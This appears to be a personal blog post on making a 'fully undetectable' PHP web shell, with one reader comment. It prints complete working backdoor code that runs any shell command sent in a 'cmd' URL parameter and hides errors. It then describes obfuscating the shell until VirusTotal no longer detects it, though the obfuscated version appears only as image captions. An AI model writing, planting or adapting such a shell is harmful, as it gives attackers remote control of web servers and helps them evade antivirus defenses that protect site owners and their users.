PHP – Fully Undetectable Web Shell

Today, i wanna try to create a simple undetected (hopefully FUD) web shell backdoor. I am using VirusTotal (yes, i want them to check my file, lol..).

So, what is FUD?

Fully undetectable (usually shortened as “FUD”) can stand for data that had been encrypted, making it appear to be random noise. It can also stand for software that cannot be detected by anti-viruses when a scan is performed. The term is used in hacker circles to refer to something that appears to be clean to many anti-viruses, even though it is a hacking tool.
Source : https://en.wikipedia.org/wiki/Fully_undetectable

Here is my simple (actually primary) shell without any obfuscation :

<?php
error_reporting(0);
set_time_limit(0);

function eksekusi($in) {
	$out = '';
	if(function_exists('exec')) {
		@exec($in,$out);
		$out = @join("\n",$out);
	}elseif(function_exists('passthru')) {
		ob_start();
		@passthru($in);
		$out = ob_get_clean();
	}elseif(function_exists('system')) {
		ob_start();
		@system($in);
		$out = ob_get_clean();
	}elseif(function_exists('shell_exec')) $out = shell_exec($in);
	elseif(is_resource($f = @popen($in,"r"))) {
		$out = "";
		while([email protected]($f))
			$out .= fread($f,1024);
		pclose($f);
	}
	return $out;
}

if(isset($_GET['cmd'])) {
    echo "<pre>";
    echo eksekusi($_GET['cmd']);
}
?>

and here is the VirusTotal result :

Simple Shell

 

 

Now we can see, my web shell was detected by Avast, AVware and Bkav.

Lets try to obfuscate the shell.

Obfucated web shell

 

And here is the VirusTotal result :

FUD web shell

 

Cheers..

1 thought on “PHP – Fully Undetectable Web Shell”

  1. I believe that when we upload a file for testing on virustotal and he passes it he puts a double check on the file afterwards, because he always accuses it as malware afterwards

Leave a Comment

Your email address will not be published. Required fields are marked *